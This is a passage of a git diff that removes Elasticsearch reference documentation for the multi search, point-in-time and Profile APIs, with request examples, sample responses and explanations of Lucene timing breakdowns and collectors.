the response. - -`from`::: -(Optional, integer) -Starting offset for returned hits. Defaults to `0`. - -`size`::: -(Optional, integer) -Number of hits to return. Defaults to `10`. - -[[search-multi-search-api-response-body]] -==== {api-response-body-title} - -`responses`:: - (array) Includes the search response and status code for each search request - matching its order in the original multi search request. If there was a - complete failure for a specific search request, an object with `error` message - and corresponding status code will be returned in place of the actual search - response. - - -[[search-multi-search-api-example]] -==== {api-examples-title} - -The header part includes which data streams, indices, and index aliases to -search. The header also indicates the `search_type`, -`preference`, and `routing`. The body includes the typical search body request -(including the `query`, `aggregations`, `from`, `size`, and so on). - -[source,js] --------------------------------------------------- -$ cat requests -{"index" : "test"} -{"query" : {"match_all" : {}}, "from" : 0, "size" : 10} -{"index" : "test", "search_type" : "dfs_query_then_fetch"} -{"query" : {"match_all" : {}}} -{} -{"query" : {"match_all" : {}}} - -{"query" : {"match_all" : {}}} -{"search_type" : "dfs_query_then_fetch"} -{"query" : {"match_all" : {}}} --------------------------------------------------- -// NOTCONSOLE - -[source,js] --------------------------------------------------- -$ curl -H "Content-Type: application/x-ndjson" -XGET localhost:9200/_msearch --data-binary "@requests"; echo --------------------------------------------------- -// NOTCONSOLE - -Note, the above includes an example of an empty header (can also be just -without any content) which is supported as well. - - -The endpoint also allows you to search against data streams, indices, and index -aliases in the request path. In this case, it will be used as the default target -unless explicitly specified in the header's `index` parameter. For example: - -[source,console] --------------------------------------------------- -GET my-index-000001/_msearch -{} -{"query" : {"match_all" : {}}, "from" : 0, "size" : 10} -{} -{"query" : {"match_all" : {}}} -{"index" : "my-index-000002"} -{"query" : {"match_all" : {}}} --------------------------------------------------- -// TEST[setup:my_index] - -The above will execute the search against the `my-index-000001` index for all the -requests that don't define an `index` target in the request body. The last -search will be executed against the `my-index-000002` index. - -The `search_type` can be set in a similar manner to globally apply to -all search requests. - - -[[msearch-security]] -==== Security - -See <> - - -[[template-msearch]] -==== Template support - -Much like described in <> for the _search resource, _msearch -also provides support for templates. Submit them like follows for inline -templates: - -[source,console] ------------------------------------------------ -GET _msearch/template -{"index" : "my-index-000001"} -{ "source" : "{ \"query\": { \"match\": { \"message\" : \"{{keywords}}\" } } } }", "params": { "query_type": "match", "keywords": "some message" } } -{"index" : "my-index-000001"} -{ "source" : "{ \"query\": { \"match_{{template}}\": {} } }", "params": { "template": "all" } } ------------------------------------------------ -// TEST[setup:my_index] - - -You can also create search templates: - -[source,console] ------------------------------------------- -POST /_scripts/my_template_1 -{ - "script": { - "lang": "mustache", - "source": { - "query": { - "match": { - "message": "{{query_string}}" - } - } - } - } -} ------------------------------------------- -// TEST[setup:my_index] - - -[source,console] ------------------------------------------- -POST /_scripts/my_template_2 -{ - "script": { - "lang": "mustache", - "source": { - "query": { - "term": { - "{{field}}": "{{value}}" - } - } - } - } -} ------------------------------------------- -// TEST[continued] - -You can use search templates in a _msearch: - -[source,console] ------------------------------------------------ -GET _msearch/template -{"index" : "main"} -{ "id": "my_template_1", "params": { "query_string": "some message" } } -{"index" : "main"} -{ "id": "my_template_2", "params": { "field": "user", "value": "test" } } ------------------------------------------------ -// TEST[continued] - - -[[multi-search-partial-responses]] -==== Partial responses - -To ensure fast responses, the multi search API will respond with partial results -if one or more shards fail. See <> for more -information. - - -[[msearch-cancellation]] -==== Search Cancellation - -Multi searches can be cancelled using standard <> -mechanism and are also automatically cancelled when the http connection used to -perform the request is closed by the client. It is fundamental that the http -client sending requests closes connections whenever requests time out or are -aborted. Cancelling an msearch request will also cancel all of the corresponding -sub search requests. diff --git a/docs/reference/search/point-in-time-api.asciidoc b/docs/reference/search/point-in-time-api.asciidoc deleted file mode 100644 index f6b962a721f..00000000000 --- a/docs/reference/search/point-in-time-api.asciidoc +++ /dev/null @@ -1,120 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[point-in-time-api]] -=== Point in time API -++++ -Point in time -++++ - -A search request by default executes against the most recent visible data of -the target indices, which is called point in time. Elasticsearch pit (point in time) -is a lightweight view into the state of the data as it existed when initiated. -In some cases, it's preferred to perform multiple search requests using -the same point in time. For example, if <> happen between -search_after requests, then the results of those requests might not be consistent as -changes happening between searches are only visible to the more recent point in time. - -A point in time must be opened explicitly before being used in search requests. The -keep_alive parameter tells Elasticsearch how long it should keep a point in time alive, -e.g. `?keep_alive=5m`. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_pit?keep_alive=1m --------------------------------------------------- -// TEST[setup:my_index] - -The result from the above request includes a `id`, which should -be passed to the `id` of the `pit` parameter of a search request. - -[source,console] --------------------------------------------------- -POST /_search <1> -{ - "size": 100, - "query": { - "match" : { - "title" : "elasticsearch" - } - }, - "pit": { - "id": "46ToAwMDaWR4BXV1aWQxAgZub2RlXzEAAAAAAAAAAAEBYQNpZHkFdXVpZDIrBm5vZGVfMwAAAAAAAAAAKgFjA2lkeQV1dWlkMioGbm9kZV8yAAAAAAAAAAAMAWICBXV1aWQyAAAFdXVpZDEAAQltYXRjaF9hbGw_gAAAAA==", <2> - "keep_alive": "1m" <3> - } -} --------------------------------------------------- -// TEST[catch:missing] - -<1> A search request with the `pit` parameter must not specify `index`, `routing`, -and {ref}/search-request-body.html#request-body-search-preference[`preference`] -as these parameters are copied from the point in time. -<2> The `id` parameter tells Elasticsearch to execute the request using contexts -from this point int time. -<3> The `keep_alive` parameter tells Elasticsearch how long it should extend -the time to live of the point in time. - -IMPORTANT: The open point in time request and each subsequent search request can -return different `id`; thus always use the most recently received `id` for the -next search request. - -[[point-in-time-keep-alive]] -==== Keeping point in time alive -The `keep_alive` parameter, which is passed to a open point in time request and -search request, extends the time to live of the corresponding point in time. -The value (e.g. `1m`, see <>) does not need to be long enough to -process all data -- it just needs to be long enough for the next request. - -Normally, the background merge process optimizes the index by merging together -smaller segments to create new, bigger segments. Once the smaller segments are -no longer needed they are deleted. However, open point-in-times prevent the -old segments from being deleted since they are still in use. - -TIP: Keeping older segments alive means that more disk space and file handles -are needed. Ensure that you have configured your nodes to have ample free file -handles. See <>. - -Additionally, if a segment contains deleted or updated documents then the -point in time must keep track of whether each document in the segment was live at -the time of the initial search request. Ensure that your nodes have sufficient heap -space if you have many open point-in-times on an index that is subject to ongoing -deletes or updates. - -You can check how many point-in-times (i.e, search contexts) are open with the -<>: - -[source,console] ---------------------------------------- -GET /_nodes/stats/indices/search ---------------------------------------- - -[[close-point-in-time-api]] -==== Close point in time API - -Point-in-time is automatically closed when its `keep_alive` has -been elapsed. However keeping point-in-times has a cost, as discussed in the -<>. Point-in-times should be closed -as soon as they are no longer used in search requests. - -[source,console] ---------------------------------------- -DELETE /_pit -{ - "id" : "46ToAwMDaWR4BXV1aWQxAgZub2RlXzEAAAAAAAAAAAEBYQNpZHkFdXVpZDIrBm5vZGVfMwAAAAAAAAAAKgFjA2lkeQV1dWlkMioGbm9kZV8yAAAAAAAAAAAMAWIBBXV1aWQyAAA=" -} ---------------------------------------- -// TEST[catch:missing] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "succeeded": true, <1> - "num_freed": 3 <2> -} --------------------------------------------------- -// TESTRESPONSE[s/"succeeded": true/"succeeded": $body.succeeded/] -// TESTRESPONSE[s/"num_freed": 3/"num_freed": $body.num_freed/] - -<1> If true, all search contexts associated with the point-in-time id are successfully closed -<2> The number of search contexts have been successfully closed diff --git a/docs/reference/search/point-in-time.asciidoc b/docs/reference/search/point-in-time.asciidoc deleted file mode 100644 index a79ca0f3ad4..00000000000 --- a/docs/reference/search/point-in-time.asciidoc +++ /dev/null @@ -1,116 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[point-in-time]] -==== Point in time - -A search request by default executes against the most recent visible data of -the target indices, which is called point in time. Elasticsearch pit (point in time) -is a lightweight view into the state of the data as it existed when initiated. -In some cases, it's preferred to perform multiple search requests using -the same point in time. For example, if <> happen between -search_after requests, then the results of those requests might not be consistent as -changes happening between searches are only visible to the more recent point in time. - -A point in time must be opened explicitly before being used in search requests. The -keep_alive parameter tells Elasticsearch how long it should keep a point in time alive, -e.g. `?keep_alive=5m`. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_pit?keep_alive=1m --------------------------------------------------- -// TEST[setup:my_index] - -The result from the above request includes a `id`, which should -be passed to the `id` of the `pit` parameter of a search request. - -[source,console] --------------------------------------------------- -POST /_search <1> -{ - "size": 100, - "query": { - "match" : { - "title" : "elasticsearch" - } - }, - "pit": { - "id": "46ToAwMDaWR4BXV1aWQxAgZub2RlXzEAAAAAAAAAAAEBYQNpZHkFdXVpZDIrBm5vZGVfMwAAAAAAAAAAKgFjA2lkeQV1dWlkMioGbm9kZV8yAAAAAAAAAAAMAWICBXV1aWQyAAAFdXVpZDEAAQltYXRjaF9hbGw_gAAAAA==", <2> - "keep_alive": "1m" <3> - } -} --------------------------------------------------- -// TEST[catch:missing] - -<1> A search request with the `pit` parameter must not specify `index`, `routing`, -and {ref}/search-request-body.html#request-body-search-preference[`preference`] -as these parameters are copied from the point in time. -<2> The `id` parameter tells Elasticsearch to execute the request using contexts -from this point int time. -<3> The `keep_alive` parameter tells Elasticsearch how long it should extend -the time to live of the point in time. - -IMPORTANT: The open point in time request and each subsequent search request can -return different `id`; thus always use the most recently received `id` for the -next search request. - -[[point-in-time-keep-alive]] -===== Keeping point in time alive -The `keep_alive` parameter, which is passed to a open point in time request and -search request, extends the time to live of the corresponding point in time. -The value (e.g. `1m`, see <>) does not need to be long enough to -process all data -- it just needs to be long enough for the next request. - -Normally, the background merge process optimizes the index by merging together -smaller segments to create new, bigger segments. Once the smaller segments are -no longer needed they are deleted. However, open point-in-times prevent the -old segments from being deleted since they are still in use. - -TIP: Keeping older segments alive means that more disk space and file handles -are needed. Ensure that you have configured your nodes to have ample free file -handles. See <>. - -Additionally, if a segment contains deleted or updated documents then the -point in time must keep track of whether each document in the segment was live at -the time of the initial search request. Ensure that your nodes have sufficient heap -space if you have many open point-in-times on an index that is subject to ongoing -deletes or updates. - -You can check how many point-in-times (i.e, search contexts) are open with the -<>: - -[source,console] ---------------------------------------- -GET /_nodes/stats/indices/search ---------------------------------------- - -===== Close point in time API - -Point-in-time is automatically closed when its `keep_alive` has -been elapsed. However keeping point-in-times has a cost, as discussed in the -<>. Point-in-times should be closed -as soon as they are no longer used in search requests. - -[source,console] ---------------------------------------- -DELETE /_pit -{ - "id" : "46ToAwMDaWR4BXV1aWQxAgZub2RlXzEAAAAAAAAAAAEBYQNpZHkFdXVpZDIrBm5vZGVfMwAAAAAAAAAAKgFjA2lkeQV1dWlkMioGbm9kZV8yAAAAAAAAAAAMAWIBBXV1aWQyAAA=" -} ---------------------------------------- -// TEST[catch:missing] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "succeeded": true, <1> - "num_freed": 3 <2> -} --------------------------------------------------- -// TESTRESPONSE[s/"succeeded": true/"succeeded": $body.succeeded/] -// TESTRESPONSE[s/"num_freed": 3/"num_freed": $body.num_freed/] - -<1> If true, all search contexts associated with the point-in-time id are successfully closed -<2> The number of search contexts have been successfully closed diff --git a/docs/reference/search/profile.asciidoc b/docs/reference/search/profile.asciidoc deleted file mode 100644 index a48479d62f5..00000000000 --- a/docs/reference/search/profile.asciidoc +++ /dev/null @@ -1,945 +0,0 @@ -[[search-profile]] -=== Profile API - -WARNING: The Profile API is a debugging tool and adds significant overhead to search execution. - -Provides detailed timing information about the execution of individual -components in a search request. - - -[[search-profile-api-desc]] -==== {api-description-title} - -The Profile API gives the user insight into how search requests are executed at -a low level so that the user can understand why certain requests are slow, and -take steps to improve them. Note that the Profile API, -<>, doesn't measure network latency, -time spent in the search fetch phase, time spent while the requests spends in -queues or while merging shard responses on the coordinating node. - -The output from the Profile API is *very* verbose, especially for complicated -requests executed across many shards. Pretty-printing the response is -recommended to help understand the output. - - -[[search-profile-api-example]] -==== {api-examples-title} - - -Any `_search` request can be profiled by adding a top-level `profile` parameter: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search -{ - "profile": true,<1> - "query" : { - "match" : { "message" : "GET /search" } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -<1> Setting the top-level `profile` parameter to `true` will enable profiling -for the search. - - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "took": 25, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped": 0, - "failed": 0 - }, - "hits": { - "total": { - "value": 5, - "relation": "eq" - }, - "max_score": 0.17402273, - "hits": [...] <1> - }, - "profile": { - "shards": [ - { - "id": "[2aE02wS1R8q_QFnYu6vDVQ][my-index-000001][0]", - "searches": [ - { - "query": [ - { - "type": "BooleanQuery", - "description": "message:get - message:search", "time_in_nanos" : 11972972, "breakdown" : - { - "set_min_competitive_score_count": 0, - "match_count": 5, - "shallow_advance_count": 0, - "set_min_competitive_score": 0, - "next_doc": 39022, - "match": 4456, - "next_doc_count": 5, - "score_count": 5, - "compute_max_score_count": 0, - "compute_max_score": 0, - "advance": 84525, - "advance_count": 1, - "score": 37779, - "build_scorer_count": 2, - "create_weight": 4694895, - "shallow_advance": 0, - "create_weight_count": 1, - "build_scorer": 7112295 - }, - "children": [ - { - "type": "TermQuery", - "description": "message:get", - "time_in_nanos": 3801935, - "breakdown": { - "set_min_competitive_score_count": 0, - "match_count": 0, - "shallow_advance_count": 3, - "set_min_competitive_score": 0, - "next_doc": 0, - "match": 0, - "next_doc_count": 0, - "score_count": 5, - "compute_max_score_count": 3, - "compute_max_score": 32487, - "advance": 5749, - "advance_count": 6, - "score": 16219, - "build_scorer_count": 3, - "create_weight": 2382719, - "shallow_advance": 9754, - "create_weight_count": 1, - "build_scorer": 1355007 - } - }, - { - "type": "TermQuery", - "description": "message:search", - "time_in_nanos": 205654, - "breakdown": { - "set_min_competitive_score_count": 0, - "match_count": 0, - "shallow_advance_count": 3, - "set_min_competitive_score": 0, - "next_doc": 0, - "match": 0, - "next_doc_count": 0, - "score_count": 5, - "compute_max_score_count": 3, - "compute_max_score": 6678, - "advance": 12733, - "advance_count": 6, - "score": 6627, - "build_scorer_count": 3, - "create_weight": 130951, - "shallow_advance": 2512, - "create_weight_count": 1, - "build_scorer": 46153 - } - } - ] - } - ], - "rewrite_time": 451233, - "collector": [ - { - "name": "SimpleTopScoreDocCollector", - "reason": "search_top_hits", - "time_in_nanos": 775274 - } - ] - } - ], - "aggregations": [] - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 25/"took": $body.took/] -// TESTRESPONSE[s/"hits": \[...\]/"hits": $body.$_path/] -// TESTRESPONSE[s/(?<=[" ])\d+(\.\d+)?/$body.$_path/] -// TESTRESPONSE[s/\[2aE02wS1R8q_QFnYu6vDVQ\]\[my-index-000001\]\[0\]/$body.$_path/] - -<1> Search results are returned, but were omitted here for brevity. - -Even for a simple query, the response is relatively complicated. Let's break it -down piece-by-piece before moving to more complex examples. - - -The overall structure of the profile response is as follows: - -[source,console-result] --------------------------------------------------- -{ - "profile": { - "shards": [ - { - "id": "[2aE02wS1R8q_QFnYu6vDVQ][my-index-000001][0]", <1> - "searches": [ - { - "query": [...], <2> - "rewrite_time": 51443, <3> - "collector": [...] <4> - } - ], - "aggregations": [...] <5> - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"profile": /"took": $body.took, "timed_out": $body.timed_out, "_shards": $body._shards, "hits": $body.hits, "profile": /] -// TESTRESPONSE[s/(?<=[" ])\d+(\.\d+)?/$body.$_path/] -// TESTRESPONSE[s/\[2aE02wS1R8q_QFnYu6vDVQ\]\[my-index-000001\]\[0\]/$body.$_path/] -// TESTRESPONSE[s/"query": \[...\]/"query": $body.$_path/] -// TESTRESPONSE[s/"collector": \[...\]/"collector": $body.$_path/] -// TESTRESPONSE[s/"aggregations": \[...\]/"aggregations": []/] -<1> A profile is returned for each shard that participated in the response, and -is identified by a unique ID. -<2> Each profile contains a section which holds details about the query -execution. -<3> Each profile has a single time representing the cumulative rewrite time. -<4> Each profile also contains a section about the Lucene Collectors which run -the search. -<5> Each profile contains a section which holds the details about the -aggregation execution. - -Because a search request may be executed against one or more shards in an index, -and a search may cover one or more indices, the top level element in the profile -response is an array of `shard` objects. Each shard object lists its `id` which -uniquely identifies the shard. The ID's format is -`[nodeID][indexName][shardID]`. - -The profile itself may consist of one or more "searches", where a search is a -query executed against the underlying Lucene index. Most search requests -submitted by the user will only execute a single `search` against the Lucene -index. But occasionally multiple searches will be executed, such as including a -global aggregation (which needs to execute a secondary "match_all" query for the -global context). - -Inside each `search` object there will be two arrays of profiled information: -a `query` array and a `collector` array. Alongside the `search` object is an -`aggregations` object that contains the profile information for the -aggregations. In the future, more sections may be added, such as `suggest`, -`highlight`, etc. - -There will also be a `rewrite` metric showing the total time spent rewriting the -query (in nanoseconds). - -NOTE: As with other statistics apis, the Profile API supports human readable outputs. This can be turned on by adding -`?human=true` to the query string. In this case, the output contains the additional `time` field containing rounded, -human readable timing information (e.g. `"time": "391,9ms"`, `"time": "123.3micros"`). - -[[profiling-queries]] -==== Profiling Queries - -[NOTE] -======================================= -The details provided by the Profile API directly expose Lucene class names and concepts, which means -that complete interpretation of the results require fairly advanced knowledge of Lucene. This -page attempts to give a crash-course in how Lucene executes queries so that you can use the Profile API to successfully -diagnose and debug queries, but it is only an overview. For complete understanding, please refer -to Lucene's documentation and, in places, the code. - -With that said, a complete understanding is often not required to fix a slow query. It is usually -sufficient to see that a particular component of a query is slow, and not necessarily understand why -the `advance` phase of that query is the cause, for example. -======================================= - -[[query-section]] -===== `query` Section - -The `query` section contains detailed timing of the query tree executed by -Lucene on a particular shard. The overall structure of this query tree will -resemble your original Elasticsearch query, but may be slightly (or sometimes -very) different. It will also use similar but not always identical naming. -Using our previous `match` query example, let's analyze the `query` section: - -[source,console-result] --------------------------------------------------- -"query": [ - { - "type": "BooleanQuery", - "description": "message:get message:search", - "time_in_nanos": "11972972", - "breakdown": {...}, <1> - "children": [ - { - "type": "TermQuery", - "description": "message:get", - "time_in_nanos": "3801935", - "breakdown": {...} - }, - { - "type": "TermQuery", - "description": "message:search", - "time_in_nanos": "205654", - "breakdown": {...} - } - ] - } -] --------------------------------------------------- -// TESTRESPONSE[s/^/{\n"took": $body.took,\n"timed_out": $body.timed_out,\n"_shards": $body._shards,\n"hits": $body.hits,\n"profile": {\n"shards": [ {\n"id": "$body.$_path",\n"searches": [{\n/] -// TESTRESPONSE[s/]$/],"rewrite_time": $body.$_path, "collector": $body.$_path}], "aggregations": []}]}}/] -// TESTRESPONSE[s/(?<=[" ])\d+(\.\d+)?/$body.$_path/] -// TESTRESPONSE[s/"breakdown": \{...\}/"breakdown": $body.$_path/] -<1> The breakdown timings are omitted for simplicity. - -Based on the profile structure, we can see that our `match` query was rewritten -by Lucene into a BooleanQuery with two clauses (both holding a TermQuery). The -`type` field displays the Lucene class name, and often aligns with the -equivalent name in Elasticsearch. The `description` field displays the Lucene -explanation text for the query, and is made available to help differentiating -between parts of your query (e.g. both `message:get` and `message:search` are -TermQuery's and would appear identical otherwise. - -The `time_in_nanos` field shows that this query took ~11.9ms for the entire -BooleanQuery to execute. The recorded time is inclusive of all children. - -The `breakdown` field will give detailed stats about how the time was spent, -we'll look at that in a moment. Finally, the `children` array lists any -sub-queries that may be present. Because we searched for two values ("get -search"), our BooleanQuery holds two children TermQueries. They have identical -information (type, time, breakdown, etc). Children are allowed to have their -own children. - -===== Timing Breakdown - -The `breakdown` component lists detailed timing statistics about low-level -Lucene execution: - -[source,console-result] --------------------------------------------------- -"breakdown": { - "set_min_competitive_score_count": 0, - "match_count": 5, - "shallow_advance_count": 0, - "set_min_competitive_score": 0, - "next_doc": 39022, - "match": 4456, - "next_doc_count": 5, - "score_count": 5, - "compute_max_score_count": 0, - "compute_max_score": 0, - "advance": 84525, - "advance_count": 1, - "score": 37779, - "build_scorer_count": 2, - "create_weight": 4694895, - "shallow_advance": 0, - "create_weight_count": 1, - "build_scorer": 7112295 -} --------------------------------------------------- -// TESTRESPONSE[s/^/{\n"took": $body.took,\n"timed_out": $body.timed_out,\n"_shards": $body._shards,\n"hits": $body.hits,\n"profile": {\n"shards": [ {\n"id": "$body.$_path",\n"searches": [{\n"query": [{\n"type": "BooleanQuery",\n"description": "message:get message:search",\n"time_in_nanos": $body.$_path,/] -// TESTRESPONSE[s/}$/},\n"children": $body.$_path}],\n"rewrite_time": $body.$_path, "collector": $body.$_path}], "aggregations": []}]}}/] -// TESTRESPONSE[s/(?<=[" ])\d+(\.\d+)?/$body.$_path/] - -Timings are listed in wall-clock nanoseconds and are not normalized at all. All -caveats about the overall `time_in_nanos` apply here. The intention of the -breakdown is to give you a feel for A) what machinery in Lucene is actually -eating time, and B) the magnitude of differences in times between the various -components. Like the overall time, the breakdown is inclusive of all children -times. - -The meaning of the stats are as follows: - -[discrete] -===== All parameters: - -[horizontal] -`create_weight`:: - - A Query in Lucene must be capable of reuse across multiple IndexSearchers (think of it as the engine that - executes a search against a specific Lucene Index). This puts Lucene in a tricky spot, since many queries - need to accumulate temporary state/statistics associated with the index it is being used against, but the - Query contract mandates that it must be immutable. - {empty} + - {empty} + - To get around this, Lucene asks each query to generate a Weight object which acts as a temporary context - object to hold state associated with this particular (IndexSearcher, Query) tuple. The `weight` metric - shows how long this process takes - -`build_scorer`:: - - This parameter shows how long it takes to build a Scorer for the query. A Scorer is the mechanism that - iterates over matching documents and generates a score per-document (e.g. how well does "foo" match the document?). - Note, this records the time required to generate the Scorer object, not actually score the documents. Some - queries have faster or slower initialization of the Scorer, depending on optimizations, complexity, etc. - {empty} + - {empty} + - This may also show timing associated with caching, if enabled and/or applicable for the query - -`next_doc`:: - - The Lucene method `next_doc` returns Doc ID of the next document matching the query. This statistic shows - the time it takes to determine which document is the next match, a process that varies considerably depending - on the nature of the query. Next_doc is a specialized form of advance() which is more convenient for many - queries in Lucene. It is equivalent to advance(docId() + 1) - -`advance`:: - - `advance` is the "lower level" version of next_doc: it serves the same purpose of finding the next matching - doc, but requires the calling query to perform extra tasks such as identifying and moving past skips, etc. - However, not all queries can use next_doc, so `advance` is also timed for those queries. - {empty} + - {empty} + - Conjunctions (e.g. `must` clauses in a Boolean) are typical consumers of `advance` - -`match`:: - - Some queries, such as phrase queries, match documents using a "two-phase" process. First, the document is - "approximately" matched, and if it matches approximately, it is checked a second time with a more rigorous - (and expensive) process. The second phase verification is what the `match` statistic measures. - {empty} + - {empty} + - For example, a phrase query first checks a document approximately by ensuring all terms in the phrase are - present in the doc. If all the terms are present, it then executes the second phase verification to ensure - the terms are in-order to form the phrase, which is relatively more expensive than just checking for presence - of the terms. - {empty} + - {empty} + - Because this two-phase process is only used by a handful of queries, the `match` statistic is often zero - -`score`:: - - This records the time taken to score a particular document via its Scorer - -`*_count`:: - Records the number of invocations of the particular method. For example, `"next_doc_count": 2,` - means the `nextDoc()` method was called on two different documents. This can be used to help judge - how selective queries are, by comparing counts between different query components. - - -[[collectors-section]] -===== `collectors` Section - -The Collectors portion of the response shows high-level execution details. -Lucene works by defining a "Collector" which is responsible for coordinating the -traversal, scoring, and collection of matching documents. Collectors are also -how a single query can record aggregation results, execute unscoped "global" -queries, execute post-query filters, etc. - -Looking at the previous example: - -[source,console-result] --------------------------------------------------- -"collector": [ - { - "name": "SimpleTopScoreDocCollector", - "reason": "search_top_hits", - "time_in_nanos": 775274 - } -] --------------------------------------------------- -// TESTRESPONSE[s/^/{\n"took": $body.took,\n"timed_out": $body.timed_out,\n"_shards": $body._shards,\n"hits": $body.hits,\n"profile": {\n"shards": [ {\n"id": "$body.$_path",\n"searches": [{\n"query": $body.$_path,\n"rewrite_time": $body.$_path,/] -// TESTRESPONSE[s/]$/]}], "aggregations": []}]}}/] -// TESTRESPONSE[s/(?<=[" ])\d+(\.\d+)?/$body.$_path/] - - -We see a single collector named `SimpleTopScoreDocCollector` wrapped into -`CancellableCollector`. `SimpleTopScoreDocCollector` is the default "scoring and -sorting" `Collector` used by {es}. The `reason` field attempts to give a plain -English description of the class name. The `time_in_nanos` is similar to the -time in the Query tree: a wall-clock time inclusive of all children. Similarly, -`children` lists all sub-collectors. The `CancellableCollector` that wraps -`SimpleTopScoreDocCollector` is used by {es} to detect if the current search was -cancelled and stop collecting documents as soon as it occurs. - -It should be noted that Collector times are **independent** from the Query -times. They are calculated, combined, and normalized independently! Due to the -nature of Lucene's execution, it is impossible to "merge" the times from the -Collectors into the Query section, so they are displayed in separate portions. - -For reference, the various collector reasons are: - -[horizontal] -`search_sorted`:: - - A collector that scores and sorts documents. This is the most common collector and will be seen in most - simple searches - -`search_count`:: - - A collector that only counts the number of documents that match the query, but does not fetch the source. - This is seen when `size: 0` is specified - -`search_terminate_after_count`:: - - A collector that terminates search execution after `n` matching documents have been found. This is seen - when the `terminate_after_count` query parameter has been specified - -`search_min_score`:: - - A collector that only returns matching documents that have a score greater than `n`. This is seen when - the top-level parameter `min_score` has been specified. - -`search_multi`:: - - A collector that wraps several other collectors. This is seen when combinations of search, aggregations, - global aggs, and post_filters are combined in a single search. - -`search_timeout`:: - - A collector that halts execution after a specified period of time. This is seen when a `timeout` top-level - parameter has been specified. - -`aggregation`:: - - A collector that Elasticsearch uses to run aggregations against the query scope. A single `aggregation` - collector is used to collect documents for *all* aggregations, so you will see a list of aggregations - in the name rather. - -`global_aggregation`:: - - A collector that executes an aggregation against the global query scope, rather than the specified query. - Because the global scope is necessarily different from the executed query, it must execute its own - match_all query (which you will see added to the Query section) to collect your entire dataset - - -[[rewrite-section]] -===== `rewrite` Section - -All queries in Lucene undergo a "rewriting" process. A query (and its -sub-queries) may be rewritten one or more times, and the process continues until -the query stops changing. This process allows Lucene to perform optimizations, -such as removing redundant clauses, replacing one query for a more efficient -execution path, etc. For example a Boolean -> Boolean -> TermQuery can be -rewritten to a TermQuery, because all the Booleans are unnecessary in this case. - -The rewriting process is complex and difficult to display, since queries can -change drastically. Rather than showing the intermediate results, the total -rewrite time is simply displayed as a value (in nanoseconds). This value is -cumulative and contains the total time for all queries being rewritten. - -===== A more complex example - -To demonstrate a slightly more complex query and the associated results, we can -profile the following query: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search -{ - "profile": true, - "query": { - "term": { - "user.id": { - "value": "elkbee" - } - } - }, - "aggs": { - "my_scoped_agg": { - "terms": { - "field": "http.response.status_code" - } - }, - "my_global_agg": { - "global": {}, - "aggs": { - "my_level_agg": { - "terms": { - "field": "http.response.status_code" - } - } - } - } - }, - "post_filter": { - "match": { - "message": "search" - } - } -} --------------------------------------------------- -// TEST[setup:my_index] -// TEST[s/_search/_search\?filter_path=profile.shards.id,profile.shards.searches,profile.shards.aggregations/] - - -This example has: - -- A query -- A scoped aggregation -- A global aggregation -- A post_filter - - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - ... - "profile": { - "shards": [ - { - "id": "[P6-vulHtQRWuD4YnubWb7A][my-index-000001][0]", - "searches": [ - { - "query": [ - { - "type": "TermQuery", - "description": "message:search", - "time_in_nanos": 141618, - "breakdown": { - "set_min_competitive_score_count": 0, - "match_count": 0, - "shallow_advance_count": 0, - "set_min_competitive_score": 0, - "next_doc": 0, - "match": 0, - "next_doc_count": 0, - "score_count": 0, - "compute_max_score_count": 0, - "compute_max_score": 0, - "advance": 3942, - "advance_count": 4, - "score": 0, - "build_scorer_count": 2, - "create_weight": 38380, - "shallow_advance": 0, - "create_weight_count": 1, - "build_scorer": 99296 - } - }, - { - "type": "TermQuery", - "description": "user.id:elkbee", - "time_in_nanos": 163081, - "breakdown": { - "set_min_competitive_score_count": 0, - "match_count": 0, - "shallow_advance_count": 0, - "set_min_competitive_score": 0, - "next_doc": 2447, - "match": 0, - "next_doc_count": 4, - "score_count": 4, - "compute_max_score_count": 0, - "compute_max_score": 0, - "advance": 3552, - "advance_count": 1, - "score": 5027, - "build_scorer_count": 2, - "create_weight": 107840, - "shallow_advance": 0, - "create_weight_count": 1, - "build_scorer": 44215 - } - } - ], - "rewrite_time": 4769, - "collector": [ - { - "name": "MultiCollector", - "reason": "search_multi", - "time_in_nanos": 1945072, - "children": [ - { - "name": "FilteredCollector", - "reason": "search_post_filter", - "time_in_nanos": 500850, - "children": [ - { - "name": "SimpleTopScoreDocCollector", - "reason": "search_top_hits", - "time_in_nanos": 22577 - } - ] - }, - { - "name": "MultiBucketCollector: [[my_scoped_agg, my_global_agg]]", - "reason": "aggregation", - "time_in_nanos": 867617 - } - ] - } - ] - } - ], - "aggregations": [...] <1> - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"aggregations": \[\.\.\.\]/"aggregations": $body.$_path/] -// TESTRESPONSE[s/\.\.\.//] -// TESTRESPONSE[s/(?<=[" ])\d+(\.\d+)?/$body.$_path/] -// TESTRESPONSE[s/"id": "\[P6-vulHtQRWuD4YnubWb7A\]\[my-index-000001\]\[0\]"/"id": $body.profile.shards.0.id/] -<1> The `"aggregations"` portion has been omitted because it will be covered in -the next section. - -As you can see, the output is significantly more verbose than before. All the -major portions of the query are represented: - -1. The first `TermQuery` (user.id:elkbee) represents the main `term` query. -2. The second `TermQuery` (message:search) represents the `post_filter` query. - -The Collector tree is fairly straightforward, showing how a single -CancellableCollector wraps a MultiCollector which also wraps a FilteredCollector -to execute the post_filter (and in turn wraps the normal scoring -SimpleCollector), a BucketCollector to run all scoped aggregations. - -===== Understanding MultiTermQuery output - -A special note needs to be made about the `MultiTermQuery` class of queries. -This includes wildcards, regex, and fuzzy queries. These queries emit very -verbose responses, and are not overly structured. - -Essentially, these queries rewrite themselves on a per-segment basis. If you -imagine the wildcard query `b*`, it technically can match any token that begins -with the letter "b". It would be impossible to enumerate all possible -combinations, so Lucene rewrites the query in context of the segment being -evaluated, e.g., one segment may contain the tokens `[bar, baz]`, so the query -rewrites to a BooleanQuery combination of "bar" and "baz". Another segment may -only have the token 